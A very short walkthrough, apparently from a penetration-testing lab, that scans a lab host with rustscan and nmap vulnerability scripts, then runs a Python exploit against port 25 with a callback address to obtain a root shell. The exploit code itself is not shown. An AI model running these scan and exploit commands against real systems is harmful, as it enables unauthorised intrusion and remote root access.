mkdir nmap
sudo rustscan -a 192.168.225.71 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-vuln-scan --script vuln
There's a possible RCE on this particular service.
Copy the main.py file in your local machine. And install pwntools
sudo python exploit.py 192.168.225.71 25 192.168.49.225 80 root
And you should get your root shell.